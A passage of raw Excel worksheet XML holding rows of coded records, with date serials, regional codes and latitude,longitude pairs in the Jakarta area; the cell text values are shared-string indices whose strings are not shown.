      <c r="D3299" t="s">
        <v>22</v>
      </c>
      <c r="E3299" t="s">
        <v>23</v>
      </c>
      <c r="F3299" t="s">
        <v>11004</v>
      </c>
      <c r="G3299" t="s">
        <v>11005</v>
      </c>
      <c r="H3299" t="s">
        <v>26</v>
      </c>
      <c r="I3299" t="s">
        <v>76</v>
      </c>
      <c r="J3299" t="s">
        <v>11006</v>
      </c>
      <c r="L3299" t="s">
        <v>11007</v>
      </c>
      <c r="M3299">
        <v>3174010003</v>
      </c>
      <c r="N3299">
        <v>3174010</v>
      </c>
      <c r="O3299">
        <v>3174</v>
      </c>
      <c r="P3299">
        <v>31</v>
      </c>
      <c r="Q3299" t="s">
        <v>5732</v>
      </c>
      <c r="R3299" t="s">
        <v>69</v>
      </c>
      <c r="S3299" t="s">
        <v>32</v>
      </c>
      <c r="T3299" t="s">
        <v>33</v>
      </c>
      <c r="U3299" s="5">
        <v>10672092</v>
      </c>
      <c r="V3299" s="5" t="s">
        <v>17421</v>
      </c>
      <c r="W3299" s="5">
        <v>-621552</v>
      </c>
      <c r="X3299" t="s">
        <v>21157</v>
      </c>
      <c r="Y3299" t="str">
        <f t="shared" si="51"/>
        <v>-6.21552,106.72092</v>
      </c>
    </row>
    <row r="3300" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3300">
        <v>259638</v>
      </c>
      <c r="B3300" s="1">
        <v>44247</v>
      </c>
      <c r="C3300" s="2">
        <v>0.10875</v>
      </c>
      <c r="D3300" t="s">
        <v>22</v>
      </c>
      <c r="E3300" t="s">
        <v>23</v>
      </c>
      <c r="F3300" t="s">
        <v>11008</v>
      </c>
      <c r="G3300" t="s">
        <v>11009</v>
      </c>
      <c r="H3300" t="s">
        <v>26</v>
      </c>
      <c r="I3300" t="s">
        <v>3668</v>
      </c>
      <c r="J3300" t="s">
        <v>6602</v>
      </c>
      <c r="L3300" t="s">
        <v>11010</v>
      </c>
      <c r="M3300">
        <v>3172040004</v>
      </c>
      <c r="N3300">
        <v>3172040</v>
      </c>
      <c r="O3300">
        <v>3172</v>
      </c>
      <c r="P3300">
        <v>31</v>
      </c>
      <c r="Q3300" t="s">
        <v>280</v>
      </c>
      <c r="R3300" t="s">
        <v>281</v>
      </c>
      <c r="S3300" t="s">
        <v>49</v>
      </c>
      <c r="T3300" t="s">
        <v>33</v>
      </c>
      <c r="U3300" s="5">
        <v>10688221</v>
      </c>
      <c r="V3300" s="5" t="s">
        <v>17422</v>
      </c>
      <c r="W3300" s="5">
        <v>-626055</v>
      </c>
      <c r="X3300" t="s">
        <v>21158</v>
      </c>
      <c r="Y3300" t="str">
        <f t="shared" si="51"/>
        <v>-6.26055,106.88221</v>
      </c>
    </row>
    <row r="3301" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3301">
        <v>259639</v>
      </c>
      <c r="B3301" s="1">
        <v>44247</v>
      </c>
      <c r="C3301" s="2">
        <v>0.11140046296296297</v>
      </c>
      <c r="D3301" t="s">
        <v>22</v>
      </c>
      <c r="E3301" t="s">
        <v>23</v>
      </c>
      <c r="F3301" t="s">
        <v>11011</v>
      </c>
      <c r="H3301" t="s">
        <v>26</v>
      </c>
      <c r="I3301" t="s">
        <v>1526</v>
      </c>
      <c r="J3301" t="s">
        <v>5800</v>
      </c>
      <c r="L3301" t="s">
        <v>11012</v>
      </c>
      <c r="M3301">
        <v>3173010002</v>
      </c>
      <c r="N3301">
        <v>3173010</v>
      </c>
      <c r="O3301">
        <v>3173</v>
      </c>
      <c r="P3301">
        <v>31</v>
      </c>
      <c r="Q3301" t="s">
        <v>4908</v>
      </c>
      <c r="R3301" t="s">
        <v>1481</v>
      </c>
      <c r="S3301" t="s">
        <v>62</v>
      </c>
      <c r="T3301" t="s">
        <v>33</v>
      </c>
      <c r="U3301" s="5">
        <v>10681372</v>
      </c>
      <c r="V3301" s="5" t="s">
        <v>17423</v>
      </c>
      <c r="W3301" s="5">
        <v>-621388</v>
      </c>
      <c r="X3301" t="s">
        <v>21159</v>
      </c>
      <c r="Y3301" t="str">
        <f t="shared" si="51"/>
        <v>-6.21388,106.81372</v>
      </c>
    </row>
    <row r="3302" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3302">
        <v>259640</v>
      </c>
      <c r="B3302" s="1">
        <v>44247</v>
      </c>
      <c r="C3302" s="2">
        <v>0.11210648148148149</v>
      </c>
      <c r="D3302" t="s">
        <v>22</v>
      </c>
      <c r="E3302" t="s">
        <v>23</v>
      </c>
      <c r="F3302" t="s">
        <v>11013</v>
      </c>
      <c r="G3302" t="s">
        <v>11014</v>
      </c>
      <c r="H3302" t="s">
        <v>26</v>
      </c>
      <c r="I3302" t="s">
        <v>929</v>
      </c>
      <c r="J3302" t="s">
        <v>2802</v>
      </c>
      <c r="L3302" t="s">
        <v>11015</v>
      </c>
      <c r="M3302">
        <v>3172080002</v>
      </c>
      <c r="N3302">
        <v>3172080</v>
      </c>
      <c r="O3302">
        <v>3172</v>
      </c>
      <c r="P3302">
        <v>31</v>
      </c>
      <c r="Q3302" t="s">
        <v>2804</v>
      </c>
      <c r="R3302" t="s">
        <v>141</v>
      </c>
      <c r="S3302" t="s">
        <v>49</v>
      </c>
      <c r="T3302" t="s">
        <v>33</v>
      </c>
      <c r="U3302" s="5">
        <v>10693774</v>
      </c>
      <c r="V3302" s="5" t="s">
        <v>17424</v>
      </c>
      <c r="W3302" s="5">
        <v>-619178</v>
      </c>
      <c r="X3302" t="s">
        <v>18886</v>
      </c>
      <c r="Y3302" t="str">
        <f t="shared" si="51"/>
        <v>-6.19178,106.93774</v>
      </c>
    </row>
    <row r="3303" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3303">
        <v>259641</v>
      </c>
      <c r="B3303" s="1">
        <v>44247</v>
      </c>
      <c r="C3303" s="2">
        <v>0.11228009259259258</v>
      </c>
      <c r="D3303" t="s">
        <v>22</v>
      </c>
      <c r="E3303" t="s">
        <v>23</v>
      </c>
      <c r="F3303" t="s">
        <v>11016</v>
      </c>
      <c r="G3303" t="s">
        <v>11017</v>
      </c>
      <c r="H3303" t="s">
        <v>26</v>
      </c>
      <c r="I3303" t="s">
        <v>11018</v>
      </c>
      <c r="J3303" t="s">
        <v>8093</v>
      </c>
      <c r="L3303" t="s">
        <v>11019</v>
      </c>
      <c r="M3303">
        <v>3172020004</v>
      </c>
      <c r="N3303">
        <v>3172020</v>
      </c>
      <c r="O3303">
        <v>3172</v>
      </c>
      <c r="P3303">
        <v>31</v>
      </c>
      <c r="Q3303" t="s">
        <v>7607</v>
      </c>
      <c r="R3303" t="s">
        <v>1644</v>
      </c>
      <c r="S3303" t="s">
        <v>49</v>
      </c>
      <c r="T3303" t="s">
        <v>33</v>
      </c>
      <c r="U3303" s="5">
        <v>10686837</v>
      </c>
      <c r="V3303" s="5" t="s">
        <v>17425</v>
      </c>
      <c r="W3303" s="5">
        <v>-632233</v>
      </c>
      <c r="X3303" t="s">
        <v>21160</v>
      </c>
      <c r="Y3303" t="str">
        <f t="shared" si="51"/>
        <v>-6.32233,106.86837</v>
      </c>
    </row>
    <row r="3304" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3304">
        <v>259668</v>
      </c>
      <c r="B3304" s="1">
        <v>44247</v>
      </c>
      <c r="C3304" s="2">
        <v>0.11451388888888887</v>
      </c>
      <c r="D3304" t="s">
        <v>22</v>
      </c>
      <c r="E3304" t="s">
        <v>23</v>
      </c>
      <c r="F3304" t="s">
        <v>11020</v>
      </c>
      <c r="G3304" t="s">
        <v>11021</v>
      </c>
      <c r="H3304" t="s">
        <v>26</v>
      </c>
      <c r="I3304" t="s">
        <v>137</v>
      </c>
      <c r="J3304" t="s">
        <v>8093</v>
      </c>
      <c r="L3304" t="s">
        <v>11022</v>
      </c>
      <c r="M3304">
        <v>3172020004</v>
      </c>
      <c r="N3304">
        <v>3172020</v>
      </c>
      <c r="O3304">
        <v>3172</v>
      </c>
      <c r="P3304">
        <v>31</v>
      </c>
      <c r="Q3304" t="s">
        <v>7607</v>
      </c>
      <c r="R3304" t="s">
        <v>1644</v>
      </c>
      <c r="S3304" t="s">
        <v>49</v>
      </c>
      <c r="T3304" t="s">
        <v>33</v>
      </c>
      <c r="U3304" s="5">
        <v>10686839</v>
      </c>
      <c r="V3304" s="5" t="s">
        <v>17426</v>
      </c>
      <c r="W3304" s="5">
        <v>-632234</v>
      </c>
      <c r="X3304" t="s">
        <v>21161</v>
      </c>
      <c r="Y3304" t="str">
        <f t="shared" si="51"/>
        <v>-6.32234,106.86839</v>
      </c>
    </row>
    <row r="3305" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3305">
        <v>259669</v>
      </c>
      <c r="B3305" s="1">
        <v>44247</v>
      </c>
      <c r="C3305" s="2">
        <v>0.11474537037037037</v>
      </c>
      <c r="D3305" t="s">
        <v>22</v>
      </c>
      <c r="E3305" t="s">
        <v>23</v>
      </c>
      <c r="F3305" t="s">
        <v>11023</v>
      </c>
      <c r="G3305" t="s">
        <v>11024</v>
      </c>
      <c r="H3305" t="s">
        <v>26</v>
      </c>
      <c r="I3305" t="s">
        <v>1447</v>
      </c>
      <c r="J3305" t="s">
        <v>2627</v>
      </c>
      <c r="L3305" t="s">
        <v>11025</v>
      </c>
      <c r="M3305">
        <v>3216061011</v>
      </c>
      <c r="N3305">
        <v>3216061</v>
      </c>
      <c r="O3305">
        <v>3216</v>
      </c>
      <c r="P3305">
        <v>32</v>
      </c>
      <c r="Q3305" t="s">
        <v>11026</v>
      </c>
      <c r="R3305" t="s">
        <v>55</v>
      </c>
      <c r="S3305" t="s">
        <v>41</v>
      </c>
      <c r="T3305" t="s">
        <v>42</v>
      </c>
      <c r="U3305" s="5">
        <v>10718760</v>
      </c>
      <c r="V3305" s="5" t="s">
        <v>17427</v>
      </c>
      <c r="W3305" s="5">
        <v>-626606</v>
      </c>
      <c r="X3305" t="s">
        <v>21162</v>
      </c>
      <c r="Y3305" t="str">
        <f t="shared" si="51"/>
        <v>-6.26606,107.18760</v>
      </c>
    </row>
    <row r="3306" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3306">
        <v>259696</v>
      </c>
      <c r="B3306" s="1">
        <v>44247</v>
      </c>
      <c r="C3306" s="2">
        <v>0.11638888888888889</v>
      </c>
      <c r="D3306" t="s">
        <v>22</v>
      </c>
      <c r="E3306" t="s">
        <v>23</v>
      </c>
      <c r="F3306" t="s">
        <v>11027</v>
      </c>
      <c r="G3306" t="s">
        <v>11028</v>
      </c>
      <c r="H3306" t="s">
        <v>26</v>
      </c>
      <c r="I3306" t="s">
        <v>27</v>
      </c>
      <c r="J3306" t="s">
        <v>723</v>
      </c>
      <c r="L3306" t="s">
        <v>11029</v>
      </c>
      <c r="M3306">
        <v>3174070002</v>
      </c>
      <c r="N3306">
        <v>3174070</v>
      </c>
      <c r="O3306">
        <v>3174</v>
      </c>
      <c r="P3306">
        <v>31</v>
      </c>
      <c r="Q3306" t="s">
        <v>621</v>
      </c>
      <c r="R3306" t="s">
        <v>84</v>
      </c>
      <c r="S3306" t="s">
        <v>32</v>
      </c>
      <c r="T3306" t="s">
        <v>33</v>
      </c>
      <c r="U3306" s="5">
        <v>10674670</v>
      </c>
      <c r="V3306" s="5" t="s">
        <v>17428</v>
      </c>
      <c r="W3306" s="5">
        <v>-616444</v>
      </c>
      <c r="X3306" t="s">
        <v>21163</v>
      </c>
      <c r="Y3306" t="str">
        <f t="shared" si="51"/>
        <v>-6.16444,106.74670</v>
      </c>
    </row>
    <row r="3307" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3307">
        <v>259697</v>
      </c>
      <c r="B3307" s="1">
        <v>44247</v>
      </c>
      <c r="C3307" s="2">
        <v>0.11745370370370371</v>
      </c>
      <c r="D3307" t="s">
        <v>22</v>
      </c>
      <c r="E3307" t="s">
        <v>23</v>
      </c>
      <c r="F3307" t="s">
        <v>11030</v>
      </c>
      <c r="G3307" t="s">
        <v>11031</v>
      </c>
      <c r="H3307" t="s">
        <v>26</v>
      </c>
      <c r="I3307" t="s">
        <v>1729</v>
      </c>
      <c r="J3307" t="s">
        <v>4020</v>
      </c>
      <c r="L3307" t="s">
        <v>11032</v>
      </c>
      <c r="M3307">
        <v>3172050004</v>
      </c>
      <c r="N3307">
        <v>3172050</v>
      </c>
      <c r="O3307">
        <v>3172</v>
      </c>
      <c r="P3307">
        <v>31</v>
      </c>
      <c r="Q3307" t="s">
        <v>2717</v>
      </c>
      <c r="R3307" t="s">
        <v>358</v>
      </c>
      <c r="S3307" t="s">
        <v>49</v>
      </c>
      <c r="T3307" t="s">
        <v>33</v>
      </c>
      <c r="U3307" s="5">
        <v>10687435</v>
      </c>
      <c r="V3307" s="5" t="s">
        <v>17429</v>
      </c>
      <c r="W3307" s="5">
        <v>-629329</v>
      </c>
      <c r="X3307" t="s">
        <v>21164</v>
      </c>
      <c r="Y3307" t="str">
        <f t="shared" si="51"/>
        <v>-6.29329,106.87435</v>
      </c>
    </row>
    <row r="3308" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3308">
        <v>259698</v>
      </c>
      <c r="B3308" s="1">
        <v>44247</v>
      </c>
      <c r="C3308" s="2">
        <v>0.11811342592592593</v>
      </c>
      <c r="D3308" t="s">
        <v>22</v>
      </c>
      <c r="E3308" t="s">
        <v>23</v>
      </c>
      <c r="F3308" t="s">
        <v>11033</v>
      </c>
      <c r="G3308" t="s">
        <v>11034</v>
      </c>
      <c r="H3308" t="s">
        <v>26</v>
      </c>
      <c r="I3308" t="s">
        <v>666</v>
      </c>
      <c r="J3308" t="s">
        <v>801</v>
      </c>
      <c r="L3308" t="s">
        <v>11035</v>
      </c>
      <c r="M3308">
        <v>3174010006</v>
      </c>
      <c r="N3308">
        <v>3174010</v>
      </c>
      <c r="O3308">
        <v>3174</v>
      </c>
      <c r="P3308">
        <v>31</v>
      </c>
      <c r="Q3308" t="s">
        <v>268</v>
      </c>
      <c r="R3308" t="s">
        <v>69</v>
      </c>
      <c r="S3308" t="s">
        <v>32</v>
      </c>
      <c r="T3308" t="s">
        <v>33</v>
      </c>
      <c r="U3308" s="5">
        <v>10675900</v>
      </c>
      <c r="V3308" s="5" t="s">
        <v>17430</v>
      </c>
      <c r="W3308" s="5">
        <v>-615931</v>
      </c>
      <c r="X3308" t="s">
        <v>21165</v>
      </c>
      <c r="Y3308" t="str">
        <f t="shared" si="51"/>
        <v>-6.15931,106.75900</v>
      </c>
    </row>
    <row r="3309" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3309">
        <v>259705</v>
      </c>
      <c r="B3309" s="1">
        <v>44247</v>
      </c>
      <c r="C3309" s="2">
        <v>0.11597222222222221</v>
      </c>
      <c r="D3309" t="s">
        <v>2648</v>
      </c>
      <c r="E3309" t="s">
        <v>23</v>
      </c>
      <c r="G3309" t="s">
        <v>11036</v>
      </c>
      <c r="H3309" t="s">
        <v>26</v>
      </c>
      <c r="I3309" t="s">
        <v>710</v>
      </c>
      <c r="J3309" t="s">
        <v>5500</v>
      </c>
      <c r="L3309" t="s">
        <v>11037</v>
      </c>
      <c r="M3309">
        <v>3172070007</v>
      </c>
      <c r="N3309">
        <v>3172070</v>
      </c>
      <c r="O3309">
        <v>3172</v>
      </c>
      <c r="P3309">
        <v>31</v>
      </c>
      <c r="Q3309" t="s">
        <v>3186</v>
      </c>
      <c r="R3309" t="s">
        <v>128</v>
      </c>
      <c r="S3309" t="s">
        <v>49</v>
      </c>
      <c r="T3309" t="s">
        <v>33</v>
      </c>
      <c r="U3309" s="5">
        <v>10690245</v>
      </c>
      <c r="V3309" s="5" t="s">
        <v>16606</v>
      </c>
      <c r="W3309" s="5">
        <v>-621693</v>
      </c>
      <c r="X3309" t="s">
        <v>21166</v>
      </c>
      <c r="Y3309" t="str">
        <f t="shared" si="51"/>
        <v>-6.21693,106.90245</v>
      </c>
    </row>
    <row r="3310" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3310">
        <v>259726</v>
      </c>
      <c r="B3310" s="1">
        <v>44247</v>
      </c>
      <c r="C3310" s="2">
        <v>0.12231481481481482</v>
      </c>
      <c r="D3310" t="s">
        <v>22</v>
      </c>
      <c r="E3310" t="s">
        <v>23</v>
      </c>
      <c r="F3310" t="s">
        <v>11038</v>
      </c>
      <c r="G3310" t="s">
        <v>11039</v>
      </c>
      <c r="H3310" t="s">
        <v>26</v>
      </c>
      <c r="I3310" t="s">
        <v>5457</v>
      </c>
      <c r="J3310" t="s">
        <v>2627</v>
      </c>
      <c r="L3310" t="s">
        <v>11040</v>
      </c>
      <c r="M3310">
        <v>3275020006</v>
      </c>
      <c r="N3310">
        <v>3275020</v>
      </c>
      <c r="O3310">
        <v>3275</v>
      </c>
      <c r="P3310">
        <v>32</v>
      </c>
      <c r="Q3310" t="s">
        <v>4024</v>
      </c>
      <c r="R3310" t="s">
        <v>828</v>
      </c>
      <c r="S3310" t="s">
        <v>41</v>
      </c>
      <c r="T3310" t="s">
        <v>42</v>
      </c>
      <c r="U3310" s="5">
        <v>10694014</v>
      </c>
      <c r="V3310" s="5" t="s">
        <v>17431</v>
      </c>
      <c r="W3310" s="5">
        <v>-627135</v>
      </c>
      <c r="X3310" t="s">
        <v>19247</v>
      </c>
      <c r="Y3310" t="str">
        <f t="shared" si="51"/>
        <v>-6.27135,106.94014</v>
      </c>
    </row>
    <row r="3311" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3311">
        <v>259754</v>
      </c>
      <c r="B3311" s="1">
        <v>44247</v>
      </c>
      <c r="C3311" s="2">
        <v>0.12432870370370371</v>
      </c>
      <c r="D3311" t="s">
        <v>22</v>
      </c>
      <c r="E3311" t="s">
        <v>23</v>
      </c>
      <c r="F3311" t="s">
        <v>11041</v>
      </c>
      <c r="G3311" t="s">
        <v>11042</v>
      </c>
      <c r="H3311" t="s">
        <v>26</v>
      </c>
      <c r="I3311" t="s">
        <v>1651</v>
      </c>
      <c r="J3311" t="s">
        <v>2627</v>
      </c>
      <c r="L3311" t="s">
        <v>4588</v>
      </c>
      <c r="M3311">
        <v>3275012002</v>
      </c>
      <c r="N3311">
        <v>3275012</v>
      </c>
      <c r="O3311">
        <v>3275</v>
      </c>
      <c r="P3311">
        <v>32</v>
      </c>
      <c r="Q3311" t="s">
        <v>4208</v>
      </c>
      <c r="R3311" t="s">
        <v>4089</v>
      </c>
      <c r="S3311" t="s">
        <v>41</v>
      </c>
      <c r="T3311" t="s">
        <v>42</v>
      </c>
      <c r="U3311" s="5">
        <v>10693971</v>
      </c>
      <c r="V3311" s="5" t="s">
        <v>17432</v>
      </c>
      <c r="W3311" s="5">
        <v>-631968</v>
      </c>
      <c r="X3311" t="s">
        <v>21167</v>
      </c>
      <c r="Y3311" t="str">
        <f t="shared" si="51"/>
        <v>-6.31968,106.93971</v>
      </c>
    </row>
    <row r="3312" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3312">
        <v>259782</v>
      </c>
      <c r="B3312" s="1">
        <v>44247</v>
      </c>
      <c r="C3312" s="2">
        <v>0.12630787037037036</v>
      </c>
      <c r="D3312" t="s">
        <v>22</v>
      </c>
      <c r="E3312" t="s">
        <v>23</v>
      </c>
      <c r="F3312" t="s">
        <v>11043</v>
      </c>
      <c r="G3312" t="s">
        <v>11044</v>
      </c>
      <c r="H3312" t="s">
        <v>26</v>
      </c>
      <c r="I3312" t="s">
        <v>1633</v>
      </c>
      <c r="J3312" t="s">
        <v>2627</v>
      </c>
      <c r="L3312" t="s">
        <v>11045</v>
      </c>
      <c r="M3312">
        <v>3216061008</v>
      </c>
      <c r="N3312">
        <v>3216061</v>
      </c>
      <c r="O3312">
        <v>3216</v>
      </c>
      <c r="P3312">
        <v>32</v>
      </c>
      <c r="Q3312" t="s">
        <v>11046</v>
      </c>
      <c r="R3312" t="s">
        <v>55</v>
      </c>
      <c r="S3312" t="s">
        <v>41</v>
      </c>
      <c r="T3312" t="s">
        <v>42</v>
      </c>
      <c r="U3312" s="5">
        <v>10713861</v>
      </c>
      <c r="V3312" s="5" t="s">
        <v>17433</v>
      </c>
      <c r="W3312" s="5">
        <v>-626797</v>
      </c>
      <c r="X3312" t="s">
        <v>21168</v>
      </c>
      <c r="Y3312" t="str">
        <f t="shared" si="51"/>
        <v>-6.26797,107.13861</v>
      </c>
    </row>
    <row r="3313" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3313">
        <v>259783</v>
      </c>
      <c r="B3313" s="1">
        <v>44247</v>
      </c>
      <c r="C3313" s="2">
        <v>0.12753472222222223</v>
      </c>
      <c r="D3313" t="s">
        <v>22</v>
      </c>
      <c r="E3313" t="s">
        <v>23</v>
      </c>
      <c r="F3313" t="s">
        <v>11047</v>
      </c>
      <c r="G3313" t="s">
        <v>11048</v>
      </c>
      <c r="H3313" t="s">
        <v>26</v>
      </c>
      <c r="I3313" t="s">
        <v>3211</v>
      </c>
      <c r="J3313" t="s">
        <v>4197</v>
      </c>
      <c r="M3313">
        <v>3172020005</v>
      </c>
      <c r="N3313">
        <v>3172020</v>
      </c>
      <c r="O3313">
        <v>3172</v>
      </c>
      <c r="P3313">
        <v>31</v>
      </c>
      <c r="Q3313" t="s">
        <v>3744</v>
      </c>
      <c r="R3313" t="s">
        <v>1644</v>
      </c>
      <c r="S3313" t="s">
        <v>49</v>
      </c>
      <c r="T3313" t="s">
        <v>33</v>
      </c>
      <c r="U3313" s="5">
        <v>10687371</v>
      </c>
      <c r="V3313" s="5" t="s">
        <v>17434</v>
      </c>
      <c r="W3313" s="5">
        <v>-630406</v>
      </c>
      <c r="X3313" t="s">
        <v>21169</v>
      </c>
      <c r="Y3313" t="str">
        <f t="shared" si="51"/>
        <v>-6.30406,106.87371</v>
      </c>
    </row>
    <row r="3314" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3314">
        <v>259811</v>
      </c>
      <c r="B3314" s="1">
        <v>44247</v>
      </c>
      <c r="C3314" s="2">
        <v>0.12998842592592594</v>
      </c>
      <c r="D3314" t="s">
        <v>22</v>
      </c>
      <c r="E3314" t="s">
        <v>23</v>
      </c>
      <c r="F3314" t="s">
        <v>11049</v>
      </c>
      <c r="G3314" t="s">
        <v>11050</v>
      </c>
      <c r="H3314" t="s">
        <v>26</v>
      </c>
      <c r="I3314" t="s">
        <v>753</v>
      </c>
      <c r="J3314" t="s">
        <v>10650</v>
      </c>
      <c r="L3314" t="s">
        <v>11051</v>
      </c>
      <c r="M3314">
        <v>3171080004</v>
      </c>
      <c r="N3314">
        <v>3171080</v>
      </c>
      <c r="O3314">
        <v>3171</v>
      </c>
      <c r="P3314">
        <v>31</v>
      </c>
      <c r="Q3314" t="s">
        <v>1403</v>
      </c>
      <c r="R3314" t="s">
        <v>1403</v>
      </c>
      <c r="S3314" t="s">
        <v>108</v>
      </c>
      <c r="T3314" t="s">
        <v>33</v>
      </c>
      <c r="U3314" s="5">
        <v>10683599</v>
      </c>
      <c r="V3314" s="5" t="s">
        <v>17435</v>
      </c>
      <c r="W3314" s="5">
        <v>-624377</v>
      </c>
      <c r="X3314" t="s">
        <v>18294</v>
      </c>
      <c r="Y3314" t="str">
        <f t="shared" si="51"/>
        <v>-6.24377,106.83599</v>
      </c>
    </row>
    <row r="3315" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3315">
        <v>259812</v>
      </c>
      <c r="B3315" s="1">
        <v>44247</v>
      </c>
      <c r="C3315" s="2">
        <v>0.13010416666666666</v>
      </c>
      <c r="D3315" t="s">
        <v>22</v>
      </c>
      <c r="E3315" t="s">
        <v>23</v>
      </c>
      <c r="F3315" t="s">
        <v>11052</v>
      </c>
      <c r="G3315" t="s">
        <v>11053</v>
      </c>
      <c r="H3315" t="s">
        <v>26</v>
      </c>
      <c r="I3315" t="s">
        <v>11054</v>
      </c>
      <c r="J3315" t="s">
        <v>10660</v>
      </c>
      <c r="L3315" t="s">
        <v>11055</v>
      </c>
      <c r="M3315">
        <v>3174020004</v>
      </c>
      <c r="N3315">
        <v>3174020</v>
      </c>
      <c r="O3315">
        <v>3174</v>
      </c>
      <c r="P3315">
        <v>31</v>
      </c>
      <c r="Q3315" t="s">
        <v>31</v>
      </c>
      <c r="R3315" t="s">
        <v>31</v>
      </c>
      <c r="S3315" t="s">
        <v>32</v>
      </c>
      <c r="T3315" t="s">
        <v>33</v>
      </c>
      <c r="U3315" s="5">
        <v>10675777</v>
      </c>
      <c r="V3315" s="5" t="s">
        <v>17436</v>
      </c>
      <c r="W3315" s="5">
        <v>-619307</v>
      </c>
      <c r="X3315" t="s">
        <v>21170</v>
      </c>
      <c r="Y3315" t="str">
        <f t="shared" si="51"/>
        <v>-6.19307,106.75777</v>
      </c>
    </row>
    <row r="3316" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3316">
        <v>259813</v>
      </c>
      <c r="B3316" s="1">
        <v>44247</v>
      </c>
      <c r="C3316" s="2">
        <v>0.1300347222222222</v>
      </c>
      <c r="D3316" t="s">
        <v>22</v>
      </c>
      <c r="E3316" t="s">
        <v>23</v>
      </c>
      <c r="F3316" t="s">
        <v>11056</v>
      </c>
      <c r="G3316" t="s">
        <v>11057</v>
      </c>
      <c r="H3316" t="s">
        <v>26</v>
      </c>
      <c r="I3316" t="s">
        <v>11058</v>
      </c>
      <c r="J3316" t="s">
        <v>3135</v>
      </c>
      <c r="L3316" t="s">
        <v>11059</v>
      </c>
      <c r="M3316">
        <v>3671010001</v>
      </c>
      <c r="N3316">
        <v>3671010</v>
      </c>
      <c r="O3316">
        <v>3671</v>
      </c>
      <c r="P3316">
        <v>36</v>
      </c>
      <c r="Q3316" t="s">
        <v>4656</v>
      </c>
      <c r="R3316" t="s">
        <v>200</v>
      </c>
      <c r="S3316" t="s">
        <v>201</v>
      </c>
      <c r="T3316" t="s">
        <v>171</v>
      </c>
      <c r="U3316" s="5">
        <v>10668762</v>
      </c>
      <c r="V3316" s="5" t="s">
        <v>17437</v>
      </c>
      <c r="W3316" s="5">
        <v>-623761</v>
      </c>
      <c r="X3316" t="s">
        <v>21171</v>
      </c>
      <c r="Y3316" t="str">
        <f t="shared" si="51"/>
        <v>-6.23761,106.68762</v>
      </c>
    </row>
    <row r="3317" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3317">
        <v>259814</v>
      </c>
      <c r="B3317" s="1">
        <v>44247</v>
      </c>
      <c r="C3317" s="2">
        <v>0.13326388888888888</v>
      </c>
      <c r="D3317" t="s">
        <v>22</v>
      </c>
      <c r="E3317" t="s">
        <v>23</v>
      </c>
      <c r="F3317" t="s">
        <v>11060</v>
      </c>
      <c r="G3317" t="s">
        <v>11061</v>
      </c>
      <c r="H3317" t="s">
        <v>26</v>
      </c>
      <c r="I3317" t="s">
        <v>974</v>
      </c>
      <c r="J3317" t="s">
        <v>11062</v>
      </c>
      <c r="L3317" t="s">
        <v>11063</v>
      </c>
      <c r="M3317">
        <v>3171020003</v>
      </c>
      <c r="N3317">
        <v>3171020</v>
      </c>
      <c r="O3317">
        <v>3171</v>
      </c>
      <c r="P3317">
        <v>31</v>
      </c>
      <c r="Q3317" t="s">
        <v>7783</v>
      </c>
      <c r="R3317" t="s">
        <v>484</v>
      </c>
      <c r="S3317" t="s">
        <v>108</v>
      </c>
      <c r="T3317" t="s">
        <v>33</v>
      </c>
      <c r="U3317" s="5">
        <v>10682702</v>
      </c>
      <c r="V3317" s="5" t="s">
        <v>17438</v>
      </c>
      <c r="W3317" s="5">
        <v>-631815</v>
      </c>
      <c r="X3317" t="s">
        <v>21172</v>
      </c>
      <c r="Y3317" t="str">
        <f t="shared" si="51"/>
        <v>-6.31815,106.82702</v>
      </c>
    </row>
    <row r="3318" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3318">
        <v>259815</v>
      </c>
      <c r="B3318" s="1">
        <v>44247</v>
      </c>
      <c r="C3318" s="2">
        <v>0.13266203703703702</v>
      </c>
      <c r="D3318" t="s">
        <v>22</v>
      </c>
      <c r="E3318" t="s">
        <v>23</v>
      </c>
      <c r="F3318" t="s">
        <v>11064</v>
      </c>
      <c r="G3318" t="s">
        <v>11065</v>
      </c>
      <c r="H3318" t="s">
        <v>26</v>
      </c>
      <c r="I3318" t="s">
        <v>9700</v>
      </c>
      <c r="J3318" t="s">
        <v>2032</v>
      </c>
      <c r="L3318" t="s">
        <v>11066</v>
      </c>
      <c r="M3318">
        <v>3174020007</v>
      </c>
      <c r="N3318">
        <v>3174020</v>
      </c>
      <c r="O3318">
        <v>3174</v>
      </c>
      <c r="P3318">
        <v>31</v>
      </c>
      <c r="Q3318" t="s">
        <v>95</v>
      </c>
      <c r="R3318" t="s">
        <v>31</v>
      </c>
      <c r="S3318" t="s">
        <v>32</v>
      </c>
      <c r="T3318" t="s">
        <v>33</v>
      </c>
      <c r="U3318" s="5">
        <v>10676767</v>
      </c>
      <c r="V3318" s="5" t="s">
        <v>17439</v>
      </c>
      <c r="W3318" s="5">
        <v>-616108</v>
      </c>
      <c r="X3318" t="s">
        <v>21173</v>
      </c>
      <c r="Y3318" t="str">
        <f t="shared" si="51"/>
        <v>-6.16108,106.76767</v>
      </c>
    </row>
    <row r="3319" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3319">
        <v>259843</v>
      </c>
      <c r="B3319" s="1">
        <v>44247</v>
      </c>
      <c r="C3319" s="2">
        <v>0.13649305555555555</v>
      </c>
      <c r="D3319" t="s">
        <v>22</v>
      </c>
      <c r="E3319" t="s">
        <v>23</v>
      </c>
      <c r="F3319" t="s">
        <v>11067</v>
      </c>
      <c r="G3319" t="s">
        <v>11068</v>
      </c>
      <c r="H3319" t="s">
        <v>26</v>
      </c>
      <c r="I3319" t="s">
        <v>166</v>
      </c>
      <c r="J3319" t="s">
        <v>4020</v>
      </c>
